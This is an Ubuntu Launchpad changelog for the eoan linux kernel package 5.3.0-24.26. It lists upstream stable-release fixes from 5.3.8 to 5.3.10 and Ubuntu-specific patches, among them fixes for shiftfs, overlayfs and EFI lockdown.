This bug was fixed in the package linux - 5.3.0-24.26
---------------
linux (5.3.0-24.26) eoan; urgency=medium
* eoan/linux: 5.3.0-24.26 -proposed tracker (LP: #1852232)
* Eoan update: 5.3.9 upstream stable release (LP: #1851550)
- io_uring: fix up O_NONBLOCK handling for sockets
- dm snapshot: introduce account_start_copy() and account_end_copy()
- dm snapshot: rework COW throttling to fix deadlock
- Btrfs: fix inode cache block reserve leak on failure to allocate data
space
- btrfs: qgroup: Always free PREALLOC META reserve in
btrfs_delalloc_release_extents()
- iio: adc: meson_saradc: Fix memory allocation order
- iio: fix center temperature of bmc150-accel-core
- libsubcmd: Make _FORTIFY_SOURCE defines dependent on the feature
- perf tests: Avoid raising SEGV using an obvious NULL dereference
- perf map: Fix overlapped map handling
- perf script brstackinsn: Fix recovery from LBR/binary mismatch
- perf jevents: Fix period for Intel fixed counters
- perf tools: Propagate get_cpuid() error
- perf annotate: Propagate perf_env__arch() error
- perf annotate: Fix the signedness of failure returns
- perf annotate: Propagate the symbol__annotate() error return
- perf annotate: Fix arch specific ->init() failure errors
- perf annotate: Return appropriate error code for allocation failures
- perf annotate: Don't return -1 for error when doing BPF disassembly
- staging: rtl8188eu: fix null dereference when kzalloc fails
- RDMA/siw: Fix serialization issue in write_space()
- RDMA/hfi1: Prevent memory leak in sdma_init
- RDMA/iw_cxgb4: fix SRQ access from dump_qp()
- RDMA/iwcm: Fix a lock inversion issue
- HID: hyperv: Use in-place iterator API in the channel callback
- kselftest: exclude failed TARGETS from runlist
- selftests/kselftest/runner.sh: Add 45 second timeout per test
- nfs: Fix nfsi->nrequests count error on nfs_inode_remove_request
- arm64: cpufeature: Effectively expose FRINT capability to userspace
- arm64: Fix incorrect irqflag restore for priority masking for compat
- arm64: ftrace: Ensure synchronisation in PLT setup for Neoverse-N1
#1542419
- tty: serial: owl: Fix the link time qualifier of 'owl_uart_exit()'
- tty: serial: rda: Fix the link time qualifier of 'rda_uart_exit()'
- serial/sifive: select SERIAL_EARLYCON
- tty: n_hdlc: fix build on SPARC
- misc: fastrpc: prevent memory leak in fastrpc_dma_buf_attach
- RDMA/core: Fix an error handling path in 'res_get_common_doit()'
- RDMA/cm: Fix memory leak in cm_add/remove_one
- RDMA/nldev: Reshuffle the code to avoid need to rebind QP in error path
- RDMA/mlx5: Do not allow rereg of a ODP MR
- RDMA/mlx5: Order num_pending_prefetch properly with synchronize_srcu
- RDMA/mlx5: Add missing synchronize_srcu() for MW cases
- gpio: max77620: Use correct unit for debounce times
- fs: cifs: mute -Wunused-const-variable message
- arm64: vdso32: Fix broken compat vDSO build warnings
- arm64: vdso32: Detect binutils support for dmb ishld
- serial: mctrl_gpio: Check for NULL pointer
- serial: 8250_omap: Fix gpio check for auto RTS/CTS
- arm64: Default to building compat vDSO with clang when CONFIG_CC_IS_CLANG
- arm64: vdso32: Don't use KBUILD_CPPFLAGS unconditionally
- efi/cper: Fix endianness of PCIe class code
- efi/x86: Do not clean dummy variable in kexec path
- MIPS: include: Mark __cmpxchg as __always_inline
- riscv: avoid kernel hangs when trapped in BUG()
- riscv: avoid sending a SIGTRAP to a user thread trapped in WARN()
- riscv: Correct the handling of unexpected ebreak in do_trap_break()
- x86/xen: Return from panic notifier
- ocfs2: clear zero in unaligned direct IO
- fs: ocfs2: fix possible null-pointer dereferences in
ocfs2_xa_prepare_entry()
- fs: ocfs2: fix a possible null-pointer dereference in
ocfs2_write_end_nolock()
- fs: ocfs2: fix a possible null-pointer dereference in
ocfs2_info_scan_inode_alloc()
- btrfs: silence maybe-uninitialized warning in clone_range
- arm64: armv8_deprecated: Checking return value for memory allocation
- sched/fair: Scale bandwidth quota and period without losing quota/period
ratio precision
- sched/vtime: Fix guest/system mis-accounting on task switch
- perf/core: Rework memory accounting in perf_mmap()
- perf/core: Fix corner case in perf_rotate_context()
- perf/x86/amd: Change/fix NMI latency mitigation to use a timestamp
- drm/amdgpu: fix memory leak
- iio: imu: adis16400: release allocated memory on failure
- iio: imu: adis16400: fix memory leak
- iio: imu: st_lsm6dsx: fix waitime for st_lsm6dsx i2c controller
- MIPS: include: Mark __xchg as __always_inline
- MIPS: fw: sni: Fix out of bounds init of o32 stack
- s390/cio: fix virtio-ccw DMA without PV
- virt: vbox: fix memory leak in hgcm_call_preprocess_linaddr
- nbd: fix possible sysfs duplicate warning
- NFSv4: Fix leak of clp->cl_acceptor string
- SUNRPC: fix race to sk_err after xs_error_report
- s390/uaccess: avoid (false positive) compiler warnings
- tracing: Initialize iter->seq after zeroing in tracing_read_pipe()
- perf annotate: Fix multiple memory and file descriptor leaks
- perf/aux: Fix tracking of auxiliary trace buffer allocation
- USB: legousbtower: fix a signedness bug in tower_probe()
- nbd: verify socket is supported during setup
- fuse: flush dirty data/metadata before non-truncate setattr
- fuse: truncate pending writes on O_TRUNC
- ALSA: bebob: Fix prototype of helper function to return negative value
- ALSA: timer: Fix mutex deadlock at releasing card
- ath10k: fix latency issue for QCA988x
- UAS: Revert commit 3ae62a42090f ("UAS: fix alignment of scatter/gather
segments")
- nl80211: fix validation of mesh path nexthop
- USB: gadget: Reject endpoints with 0 maxpacket value
- usb-storage: Revert commit 747668dbc061 ("usb-storage: Set
virt_boundary_mask to avoid SG overflows")
- USB: ldusb: fix ring-buffer locking
- USB: ldusb: fix control-message timeout
- usb: xhci: fix Immediate Data Transfer endianness
- usb: xhci: fix __le32/__le64 accessors in debugfs code
- USB: serial: whiteheat: fix potential slab corruption
- USB: serial: whiteheat: fix line-speed endianness
- xhci: Fix use-after-free regression in xhci clear hub TT implementation
- scsi: qla2xxx: Fix partial flash write of MBI
- scsi: target: cxgbit: Fix cxgbit_fw4_ack()
- HID: i2c-hid: add Trekstor Primebook C11B to descriptor override
- HID: Fix assumption that devices have inputs
- HID: fix error message in hid_open_report()
- HID: logitech-hidpp: split g920_get_config()
- HID: logitech-hidpp: rework device validation
- HID: logitech-hidpp: do all FF cleanup in hidpp_ff_destroy()
- um-ubd: Entrust re-queue to the upper layers
- s390/unwind: fix mixing regs and sp
- s390/cmm: fix information leak in cmm_timeout_handler()
- s390/idle: fix cpu idle time calculation
- ARC: perf: Accommodate big-endian CPU
- IB/hfi1: Avoid excessive retry for TID RDMA READ request
- arm64: Ensure VM_WRITE|VM_SHARED ptes are clean by default
- arm64: cpufeature: Enable Qualcomm Falkor/Kryo errata 1003
- virtio_ring: fix stalls for packed rings
- rtlwifi: rtl_pci: Fix problem of too small skb->len
- dmaengine: qcom: bam_dma: Fix resource leak
- dmaengine: tegra210-adma: fix transfer failure
- dmaengine: imx-sdma: fix size check for sdma script_number
- dmaengine: cppi41: Fix cppi41_dma_prep_slave_sg() when idle
- drm/amdgpu/gmc10: properly set BANK_SELECT and FRAGMENT_SIZE
- drm/i915: Fix PCH reference clock for FDI on HSW/BDW
- drm/amdgpu/gfx10: update gfx golden settings
- drm/amdgpu/powerplay/vega10: allow undervolting in p7
- drm/amdgpu: Fix SDMA hang when performing VKexample test
- NFS: Fix an RCU lock leak in nfs4_refresh_delegation_stateid()
- io_uring: ensure we clear io_kiocb->result before each issue
- iommu/vt-d: Fix panic after kexec -p for kdump
- batman-adv: Avoid free/alloc race when handling OGM buffer
- llc: fix sk_buff leak in llc_sap_state_process()
- llc: fix sk_buff leak in llc_conn_service()
- rxrpc: Fix call ref leak
- rxrpc: rxrpc_peer needs to hold a ref on the rxrpc_local record
- rxrpc: Fix trace-after-put looking at the put peer record
- NFC: pn533: fix use-after-free and memleaks
- bonding: fix potential NULL deref in bond_update_slave_arr
- netfilter: conntrack: avoid possible false sharing
- net: usb: sr9800: fix uninitialized local variable
- sch_netem: fix rcu splat in netem_enqueue()
- net: sched: sch_sfb: don't call qdisc_put() while holding tree lock
- iwlwifi: exclude GEO SAR support for 3168
- sched/fair: Fix low cpu usage with high throttling by removing expiration
of
cpu-local slices
- ALSA: usb-audio: DSD auto-detection for Playback Designs
- ALSA: usb-audio: Update DSD support quirks for Oppo and Rotel
- ALSA: usb-audio: Add DSD support for Gustard U16/X26 USB Interface
- RDMA/mlx5: Use irq xarray locking for mkey_table
- sched/fair: Fix -Wunused-but-set-variable warnings
- powerpc/powernv: Fix CPU idle to be called with IRQs disabled
- Revert "nvme: allow 64-bit results in passthru commands"
- Revert "ALSA: hda: Flush interrupts on disabling"
- Linux 5.3.9
- [Config] Remove CONFIG_GENERIC_COMPAT_VDSO and
CONFIG_CROSS_COMPILE_COMPAT_VDSO
* Eoan update: v5.3.8 upstream stable release (LP: #1850456)
- drm: Free the writeback_job when it with an empty fb
- drm: Clear the fence pointer when writeback job signaled
- clk: ti: dra7: Fix mcasp8 clock bits
- ARM: dts: Fix wrong clocks for dra7 mcasp
- nvme-pci: Fix a race in controller removal
- scsi: ufs: skip shutdown if hba is not powered
- scsi: megaraid: disable device when probe failed after enabled device
- scsi: qla2xxx: Silence fwdump template message
- scsi: qla2xxx: Fix unbound sleep in fcport delete path.
- scsi: qla2xxx: Fix stale mem access on driver unload
- scsi: qla2xxx: Fix N2N link reset
- scsi: qla2xxx: Fix N2N link up fail
- ARM: dts: Fix gpio0 flags for am335x-icev2
- ARM: OMAP2+: Fix missing reset done flag for am3 and am43
- ARM: OMAP2+: Add missing LCDC midlemode for am335x
- ARM: OMAP2+: Fix warnings with broken omap2_set_init_voltage()
- nvme-tcp: fix wrong stop condition in io_work
- nvme-pci: Save PCI state before putting drive into deepest state
- nvme: fix an error code in nvme_init_subsystem()
- nvme-rdma: Fix max_hw_sectors calculation
- Added QUIRKs for ADATA XPG SX8200 Pro 512GB
- nvme: Add quirk for Kingston NVME SSD running FW E8FK11.T
- nvme: allow 64-bit results in passthru commands
- drm/komeda: prevent memory leak in komeda_wb_connector_add
- nvme-rdma: fix possible use-after-free in connect timeout
- blk-mq: honor IO scheduler for multiqueue devices
- ieee802154: ca8210: prevent memory leak
- ARM: dts: am4372: Set memory bandwidth limit for DISPC
- net: dsa: qca8k: Use up to 7 ports for all operations
- MIPS: dts: ar9331: fix interrupt-controller size
- xen/efi: Set nonblocking callbacks
- loop: change queue block size to match when using DIO
- nl80211: fix null pointer dereference
- mac80211: fix txq null pointer dereference
- netfilter: nft_connlimit: disable bh on garbage collection
- net: mscc: ocelot: add missing of_node_put after calling
of_get_child_by_name
- net: dsa: rtl8366rb: add missing of_node_put after calling
of_get_child_by_name
- net: stmmac: xgmac: Not all Unicast addresses may be available
- net: stmmac: dwmac4: Always update the MAC Hash Filter
- net: stmmac: Correctly take timestamp for PTPv2
- net: stmmac: Do not stop PHY if WoL is enabled
- net: ag71xx: fix mdio subnode support
- RISC-V: Clear load reservations while restoring hart contexts
- riscv: Fix memblock reservation for device tree blob
- drm/amdgpu: fix multiple memory leaks in acp_hw_init
- drm/amd/display: memory leak
- mips: Loongson: Fix the link time qualifier of 'serial_exit()'
- net: hisilicon: Fix usage of uninitialized variable in function
mdio_sc_cfg_reg_write()
- net: stmmac: Avoid deadlock on suspend/resume
- selftests: kvm: Fix libkvm build error
- lib: textsearch: fix escapes in example code
- s390/mm: fix -Wunused-but-set-variable warnings
- net: phy: allow for reset line to be tied to a sleepy GPIO controller
- net: phy: fix write to mii-ctrl1000 register
- namespace: fix namespace.pl script to support relative paths
- Convert filldir[64]() from __put_user() to unsafe_put_user()
- elf: don't use MAP_FIXED_NOREPLACE for elf executable mappings
- Make filldir[64]() verify the directory entry filename is valid
- uaccess: implement a proper unsafe_copy_to_user() and switch filldir over
to
it
- filldir[64]: remove WARN_ON_ONCE() for bad directory entries
- net_sched: fix backward compatibility for TCA_KIND
- net_sched: fix backward compatibility for TCA_ACT_KIND
- libata/ahci: Fix PCS quirk application
- Revert "drm/radeon: Fix EEH during kexec"
- ocfs2: fix panic due to ocfs2_wq is null
- nvme-pci: Set the prp2 correctly when using more than 4k page
- ipv4: fix race condition between route lookup and invalidation
- ipv4: Return -ENETUNREACH if we can't create route but saddr is valid
- net: avoid potential infinite loop in tc_ctl_action()
- net: bcmgenet: Fix RGMII_MODE_EN value for GENET v1/2/3
- net: bcmgenet: Set phydev->dev_flags only for internal PHYs
- net: i82596: fix dma_alloc_attr for sni_82596
- net/ibmvnic: Fix EOI when running in XIVE mode.
- net: ipv6: fix listify ip6_rcv_finish in case of forwarding
- net: stmmac: disable/enable ptp_ref_clk in suspend/resume flow
- rxrpc: Fix possible NULL pointer access in ICMP handling
- sched: etf: Fix ordering of packets with same txtime
- sctp: change sctp_prot .no_autobind with true
- net: aquantia: temperature retrieval fix
- net: aquantia: when cleaning hw cache it should be toggled
- net: aquantia: do not pass lro session with invalid tcp checksum
- net: aquantia: correctly handle macvlan and multicast coexistence
- net: phy: micrel: Discern KSZ8051 and KSZ8795 PHYs
- net: phy: micrel: Update KSZ87xx PHY name
- net: avoid errors when trying to pop MLPS header on non-MPLS packets
- net/sched: fix corrupted L2 header with MPLS 'push' and 'pop' actions
- netdevsim: Fix error handling in nsim_fib_init and nsim_fib_exit
- net: ethernet: broadcom: have drivers select DIMLIB as needed
- net: phy: Fix "link partner" information disappear issue
- rxrpc: use rcu protection while reading sk->sk_user_data
- io_uring: fix bad inflight accounting for SETUP_IOPOLL|SETUP_SQTHREAD
- io_uring: Fix corrupted user_data
- USB: legousbtower: fix memleak on disconnect
- ALSA: hda/realtek - Add support for ALC711
- ALSA: hda/realtek - Enable headset mic on Asus MJ401TA
- ALSA: usb-audio: Disable quirks for BOSS Katana amplifiers
- ALSA: hda - Force runtime PM on Nvidia HDMI codecs
- usb: udc: lpc32xx: fix bad bit shift operation
- USB: serial: ti_usb_3410_5052: fix port-close races
- USB: ldusb: fix memleak on disconnect
- USB: usblp: fix use-after-free on disconnect
- USB: ldusb: fix read info leaks
- binder: Don't modify VMA bounds in ->mmap handler
- MIPS: tlbex: Fix build_restore_pagemask KScratch restore
- staging: wlan-ng: fix exit return when sme->key_idx >= NUM_WEPKEYS
- scsi: zfcp: fix reaction on bit error threshold notification
- scsi: sd: Ignore a failure to sync cache due to lack of authorization
- scsi: core: save/restore command resid for error handling
- scsi: core: try to get module before removing device
- scsi: ch: Make it possible to open a ch device multiple times again
- Revert "Input: elantech - enable SMBus on new (2018+) systems"
- Input: da9063 - fix capability and drop KEY_SLEEP
- Input: synaptics-rmi4 - avoid processing unknown IRQs
- Input: st1232 - fix reporting multitouch coordinates
- ASoC: rsnd: Reinitialize bit clock inversion flag for every format setting
- ACPI: CPPC: Set pcc_data[pcc_ss_id] to NULL in acpi_cppc_processor_exit()
- ACPI: NFIT: Fix unlock on error in scrub_show()
- iwlwifi: pcie: change qu with jf devices to use qu configuration
- cfg80211: wext: avoid copying malformed SSIDs
- mac80211: Reject malformed SSID elements
- drm/ttm: Restore ttm prefaulting
- drm/panfrost: Handle resetting on timeout better
- drm/amdgpu: Bail earlier when amdgpu.cik_/si_support is not set to 1
- drm/amdgpu/sdma5: fix mask value of POLL_REGMEM packet for pipe sync
- drm/i915/userptr: Never allow userptr into the mappable GGTT
- drm/i915: Favor last VBT child device with conflicting AUX ch/DDC pin
- drm/amdgpu/vce: fix allocation size in enc ring test
- drm/amdgpu/vcn: fix allocation size in enc ring test
- drm/amdgpu/uvd6: fix allocation size in enc ring test (v2)
- drm/amdgpu/uvd7: fix allocation size in enc ring test (v2)
- drm/amdgpu: user pages array memory leak fix
- drivers/base/memory.c: don't access uninitialized memmaps in
soft_offline_page_store()
- fs/proc/page.c: don't access uninitialized memmaps in fs/proc/page.c
- io_uring: Fix broken links with offloading
- io_uring: Fix race for sqes with userspace
- io_uring: used cached copies of sq->dropped and cq->overflow
- mmc: mxs: fix flags passed to dmaengine_prep_slave_sg
- mmc: cqhci: Commit descriptors before setting the doorbell
- mmc: sdhci-omap: Fix Tuning procedure for temperatures < -20C
- mm/memory-failure.c: don't access uninitialized memmaps in
memory_failure()
- mm/slub: fix a deadlock in show_slab_objects()
- mm/page_owner: don't access uninitialized memmaps when reading
/proc/pagetypeinfo
- mm/memunmap: don't access uninitialized memmap in memunmap_pages()
- mm: memcg/slab: fix panic in __free_slab() caused by premature memcg
pointer
release
- mm, compaction: fix wrong pfn handling in __reset_isolation_pfn()
- mm: memcg: get number of pages on the LRU list in memcgroup base on
lru_zone_size
- mm: memblock: do not enforce current limit for memblock_phys* family
- hugetlbfs: don't access uninitialized memmaps in
pfn_range_valid_gigantic()
- mm/memory-failure: poison read receives SIGKILL instead of SIGBUS if
mmaped
more than once
- zram: fix race between backing_dev_show and backing_dev_store
- xtensa: drop EXPORT_SYMBOL for outs*/ins*
- xtensa: fix change_bit in exclusive access option
- s390/zcrypt: fix memleak at release
- s390/kaslr: add support for R_390_GLOB_DAT relocation type
- lib/vdso: Make clock_getres() POSIX compliant again
- parisc: Fix vmap memory leak in ioremap()/iounmap()
- EDAC/ghes: Fix Use after free in ghes_edac remove path
- arm64: KVM: Trap VM ops when ARM64_WORKAROUND_CAVIUM_TX2_219_TVM is set
- arm64: Avoid Cavium TX2 erratum 219 when switching TTBR
- arm64: Enable workaround for Cavium TX2 erratum 219 when running SMT
- arm64: Allow CAVIUM_TX2_ERRATUM_219 to be selected
- CIFS: avoid using MID 0xFFFF
- cifs: Fix missed free operations
- CIFS: Fix use after free of file info structures
- perf/aux: Fix AUX output stopping
- tracing: Fix race in perf_trace_buf initialization
- fs/dax: Fix pmd vs pte conflict detection
- dm cache: fix bugs when a GFP_NOWAIT allocation fails
- irqchip/sifive-plic: Switch to fasteoi flow
- x86/boot/64: Make level2_kernel_pgt pages invalid outside kernel area
- x86/apic/x2apic: Fix a NULL pointer deref when handling a dying cpu
- x86/hyperv: Make vapic support x2apic mode
- pinctrl: cherryview: restore Strago DMI workaround for all versions
- pinctrl: armada-37xx: fix control of pins 32 and up
- pinctrl: armada-37xx: swap polarity on LED group
- btrfs: block-group: Fix a memory leak due to missing
btrfs_put_block_group()
- Btrfs: add missing extents release on file extent cluster relocation error
- btrfs: don't needlessly create extent-refs kernel thread
- Btrfs: fix qgroup double free after failure to reserve metadata for
delalloc
- Btrfs: check for the full sync flag while holding the inode lock during
fsync
- btrfs: tracepoints: Fix wrong parameter order for qgroup events
- btrfs: tracepoints: Fix bad entry members of qgroup events
- KVM: PPC: Book3S HV: XIVE: Ensure VP isn't already in use
- memstick: jmb38x_ms: Fix an error handling path in 'jmb38x_ms_probe()'
- cpufreq: Avoid cpufreq_suspend() deadlock on system shutdown
- ceph: just skip unrecognized info in ceph_reply_info_extra
- xen/netback: fix error path of xenvif_connect_data()
- PCI: PM: Fix pci_power_up()
- opp: of: drop incorrect lockdep_assert_held()
- of: reserved_mem: add missing of_node_put() for proper ref-counting
- blk-rq-qos: fix first node deletion of rq_qos_del()
- RDMA/cxgb4: Do not dma memory off of the stack
- Linux 5.3.8
- [Config] CONFIG_CAVIUM_TX2_ERRATUM_219=y
* Eoan update: 5.3.10 upstream stable release (LP: #1852111)
- regulator: of: fix suspend-min/max-voltage parsing
- ASoC: samsung: arndale: Add missing OF node dereferencing
- ASoC: wm8994: Do not register inapplicable controls for WM1811
- regulator: da9062: fix suspend_enable/disable preparation
- ASoC: topology: Fix a signedness bug in soc_tplg_dapm_widget_create()
- arm64: dts: allwinner: a64: pine64-plus: Add PHY regulator delay
- arm64: dts: allwinner: a64: Drop PMU node
- arm64: dts: allwinner: a64: sopine-baseboard: Add PHY regulator delay
- arm64: dts: Fix gpio to pinmux mapping
- regulator: ti-abb: Fix timeout in
ti_abb_wait_txdone/ti_abb_clear_all_txdone
- pinctrl: intel: Allocate IRQ chip dynamic
- ASoC: SOF: loader: fix kernel oops on firmware boot failure
- ASoC: SOF: topology: fix parse fail issue for byte/bool tuple types
- ASoC: SOF: Intel: hda: fix warnings during FW load
- ASoC: SOF: Intel: initialise and verify FW crash dump data.
- ASoC: SOF: Intel: hda: Disable DMI L1 entry during capture
- ASoC: rt5682: add NULL handler to set_jack function
- ASoC: intel: sof_rt5682: add remove function to disable jack
- ASoC: intel: bytcr_rt5651: add null check to support_button_press
- regulator: pfuze100-regulator: Variable "val" in
pfuze100_regulator_probe()
could be uninitialized
- ASoC: wm_adsp: Don't generate kcontrols without READ flags
- ASoc: rockchip: i2s: Fix RPM imbalance
- arm64: dts: rockchip: fix Rockpro64 RK808 interrupt line
- ARM: dts: logicpd-torpedo-som: Remove twl_keypad
- arm64: dts: rockchip: fix RockPro64 vdd-log regulator settings
- arm64: dts: rockchip: fix RockPro64 sdhci settings
- pinctrl: ns2: Fix off by one bugs in ns2_pinmux_enable()
- pinctrl: stmfx: fix null pointer on remove
- arm64: dts: zii-ultra: fix ARM regulator states
- ARM: dts: am3874-iceboard: Fix 'i2c-mux-idle-disconnect' usage
- ASoC: msm8916-wcd-digital: add missing MIX2 path for RX1/2
- ASoC: simple_card_utils.h: Fix potential multiple redefinition error
- ARM: dts: Use level interrupt for omap4 & 5 wlcore
- ARM: mm: fix alignment handler faults under memory pressure
- scsi: qla2xxx: fix a potential NULL pointer dereference
- scsi: scsi_dh_alua: handle RTPG sense code correctly during state
transitions
- scsi: sni_53c710: fix compilation error
- scsi: fix kconfig dependency warning related to 53C700_LE_ON_BE
- ARM: 8908/1: add __always_inline to functions called from
__get_user_check()
- ARM: 8914/1: NOMMU: Fix exc_ret for XIP
- arm64: dts: rockchip: fix RockPro64 sdmmc settings
- arm64: dts: rockchip: Fix usb-c on Hugsun X99 TV Box
- arm64: dts: lx2160a: Correct CPU core idle state name
- ARM: dts: imx6q-logicpd: Re-Enable SNVS power key
- ARM: dts: vf610-zii-scu4-aib: Specify 'i2c-mux-idle-disconnect'
- ARM: dts: imx7s: Correct GPT's ipg clock source
- arm64: dts: imx8mq: Use correct clock for usdhc's ipg clk
- arm64: dts: imx8mm: Use correct clock for usdhc's ipg clk
- perf tools: Fix resource leak of closedir() on the error paths
- perf c2c: Fix memory leak in build_cl_output()
- 8250-men-mcb: fix error checking when get_num_ports returns -ENODEV
- perf kmem: Fix memory leak in compact_gfp_flags()
- ARM: davinci: dm365: Fix McBSP dma_slave_map entry
- drm/amdgpu: fix potential VM faults
- drm/amdgpu: fix error handling in amdgpu_bo_list_create
- scsi: target: core: Do not overwrite CDB byte 1
- scsi: hpsa: add missing hunks in reset-patch
- ASoC: Intel: sof-rt5682: add a check for devm_clk_get
- ASoC: SOF: control: return true when kcontrol values change
- tracing: Fix "gfp_t" format for synthetic events
- ARM: dts: bcm2837-rpi-cm3: Avoid leds-gpio probing issue
- i2c: aspeed: fix master pending state handling
- drm/komeda: Don't flush inactive pipes
- ARM: 8926/1: v7m: remove register save to stack before svc
- selftests: kvm: vmx_set_nested_state_test: don't check for VMX support
twice
- selftests: kvm: fix sync_regs_test with newer gccs
- ALSA: hda: Add Tigerlake/Jasperlake PCI ID
- of: unittest: fix memory leak in unittest_data_add
- MIPS: bmips: mark exception vectors as char arrays
- irqchip/gic-v3-its: Use the exact ITSList for VMOVP
- i2c: mt65xx: fix NULL ptr dereference
- i2c: stm32f7: fix first byte to send in slave mode
- i2c: stm32f7: fix a race in slave mode with arbitration loss irq
- i2c: stm32f7: remove warning when compiling with W=1
- cifs: Fix cifsInodeInfo lock_sem deadlock when reconnect occurs
- irqchip/sifive-plic: Skip contexts except supervisor in plic_init()
- nbd: protect cmd->status with cmd->lock
- nbd: handle racing with error'ed out commands
- cxgb4: fix panic when attaching to ULD fail
- cxgb4: request the TX CIDX updates to status page
- dccp: do not leak jiffies on the wire
- erspan: fix the tun_info options_len check for erspan
- inet: stop leaking jiffies on the wire
- net: annotate accesses to sk->sk_incoming_cpu
- net: annotate lockless accesses to sk->sk_napi_id
- net: dsa: bcm_sf2: Fix IMP setup for port different than 8
- net: ethernet: ftgmac100: Fix DMA coherency issue with SW checksum
- net: fix sk_page_frag() recursion from memory reclaim
- net: hisilicon: Fix ping latency when deal with high throughput
- net/mlx4_core: Dynamically set guaranteed amount of counters per VF
- netns: fix GFP flags in rtnl_net_notifyid()
- net: rtnetlink: fix a typo fbd -> fdb
- net: usb: lan78xx: Disable interrupts before calling generic_handle_irq()
- SAUCE: Revert "UBUNTU: SAUCE: (no-up) net: Zeroing the structure
ethtool_wolinfo in ethtool_get_wol()"
- net: Zeroing the structure ethtool_wolinfo in ethtool_get_wol()
- selftests: net: reuseport_dualstack: fix uninitalized parameter
- udp: fix data-race in udp_set_dev_scratch()
- vxlan: check tun_info options_len properly
- net: add skb_queue_empty_lockless()
- udp: use skb_queue_empty_lockless()
- net: use skb_queue_empty_lockless() in poll() handlers
- net: use skb_queue_empty_lockless() in busy poll contexts
- net: add READ_ONCE() annotation in __skb_wait_for_more_packets()
- ipv4: fix route update on metric change.
- selftests: fib_tests: add more tests for metric update
- net/smc: fix closing of fallback SMC sockets
- net/smc: keep vlan_id for SMC-R in smc_listen_work()
- keys: Fix memory leak in copy_net_ns
- net: phylink: Fix phylink_dbg() macro
- rxrpc: Fix handling of last subpacket of jumbo packet
- net/mlx5e: Determine source port properly for vlan push action
- net/mlx5e: Remove incorrect match criteria assignment line
- net/mlx5e: Initialize on stack link modes bitmap
- net/mlx5: Fix flow counter list auto bits struct
- net/smc: fix refcounting for non-blocking connect()
- net/mlx5: Fix rtable reference leak
- mlxsw: core: Unpublish devlink parameters during reload
- r8169: fix wrong PHY ID issue with RTL8168dp
- net/mlx5e: Fix ethtool self test: link speed
- net/mlx5e: Fix handling of compressed CQEs in case of low NAPI budget
- ipv4: fix IPSKB_FRAG_PMTU handling with fragmentation
- net: bcmgenet: don't set phydev->link from MAC
- net: dsa: b53: Do not clear existing mirrored port mask
- net: dsa: fix switch tree list
- net: ensure correct skb->tstamp in various fragmenters
- net: hns3: fix mis-counting IRQ vector numbers issue
- net: netem: fix error path for corrupted GSO frames
- net: reorder 'struct net' fields to avoid false sharing
- net: usb: lan78xx: Connect PHY before registering MAC
- r8152: add device id for Lenovo ThinkPad USB-C Dock Gen 2
- net: netem: correct the parent's backlog when corrupted packet was dropped
- net: phy: bcm7xxx: define soft_reset for 40nm EPHY
- net: bcmgenet: reset 40nm EPHY on energy detect
- net/flow_dissector: switch to siphash
- platform/x86: pmc_atom: Add Siemens SIMATIC IPC227E to critclk_systems DMI
table
- CIFS: Fix retry mid list corruption on reconnects
- selftests/powerpc: Add test case for tlbie vs mtpidr ordering issue
- selftests/powerpc: Fix compile error on tlbie_test due to newer gcc
- ASoC: pcm3168a: The codec does not support S32_LE
- arm64: dts: ti: k3-am65-main: Fix gic-its node unit-address
- usb: gadget: udc: core: Fix segfault if udc_bind_to_driver() for pending
driver fails
- Linux 5.3.10
- [Config] SND_SOC_SOF_HDA_ALWAYS_ENABLE_DMI_L1=n
* Some EFI systems fail to boot in efi_init() when booted via maas
(LP: #1851810)
- efi: efi_get_memory_map -- increase map headroom
* dkms artifacts may expire from the pool (LP: #1850958)
- [Packaging] dkms -- try launchpad librarian for pool downloads
- [Packaging] dkms -- dkms-build quieten wget verbiage
* update ENA driver to version 2.1.0 (LP: #1850175)
- net: ena: don't wake up tx queue when down
- net: ena: clean up indentation issue
* drm/i915: Add support for another CMP-H PCH (LP: #1848491)
- drm/i915/cml: Add second PCH ID for CMP
* Add Intel Comet Lake ethernet support (LP: #1848555)
- SAUCE: e1000e: Add support for Comet Lake
* seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test (LP: #1849281)
- SAUCE: seccomp: rework define for SECCOMP_USER_NOTIF_FLAG_CONTINUE
- SAUCE: seccomp: avoid overflow in implicit constant conversion
- SAUCE: seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test
* tsc marked unstable after entered PC10 on Intel CoffeeLake (LP: #1840239)
- SAUCE: x86/intel: Disable HPET on Intel Coffe Lake platforms
- SAUCE: x86/intel: Disable HPET on Intel Ice Lake platforms
* cloudimg: no iavf/i40evf module so no network available with SR-IOV enabled
cloud (LP: #1848481)
- [Packaging] include iavf/i40evf in generic
* High power consumption using 5.0.0-25-generic (LP: #1840835)
- PCI: Add a helper to check Power Resource Requirements _PR3 existence
- ALSA: hda: Allow HDA to be runtime suspended when dGPU is not bound to a
driver
- PCI: Fix missing inline for pci_pr3_present()
* CML CPUIDs (LP: #1843794)
- x86/cpu: Add Comet Lake to the Intel CPU models header
* shiftfs: prevent exceeding project quotas (LP: #1849483)
- SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective capabilities
* shiftfs: fix fallocate() (LP: #1849482)
- SAUCE: shiftfs: setup correct s_maxbytes limit
* Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
(LP: #1850443)
- Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
* [SRU][B/OEM-B/OEM-OSP1/D/E] UBUNTU: SAUCE: add rtl623 codec support and fix
mic issues (LP: #1850599)
- SAUCE: ALSA: hda/realtek - Add support for ALC623
- SAUCE: ALSA: hda/realtek - Fix 2 front mics of codec 0x623
* Suppress "hid_field_extract() called with n (192) > 32!" message floods
(LP: #1850600)
- HID: core: reformat and reduce hid_printk macros
- HID: core: Add printk_once variants to hid_warn() etc
- HID: core: fix dmesg flooding if report field larger than 32bit
* ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs
error path (LP: #1850994) // CVE-2019-15794
- SAUCE: shiftfs: Restore vm_file value when lower fs mmap fails
- SAUCE: ovl: Restore vm_file value when lower fs mmap fails
* s_iflags overlap prevents unprivileged overlayfs mounts (LP: #1851677)
- SAUCE: fs: Move SB_I_NOSUID to the top of s_iflags
* root can lift kernel lockdown (LP: #1851380)
- SAUCE: (efi-lockdown) Really don't allow lifting lockdown from userspace
* Colour banding in Lenovo G50-80 laptop display (i915) (LP: #1819968) // Eoan
update: v5.3.8 upstream stable release (LP: #1850456)
- drm/edid: Add 6 bpc quirk for SDC panel in Lenovo G50
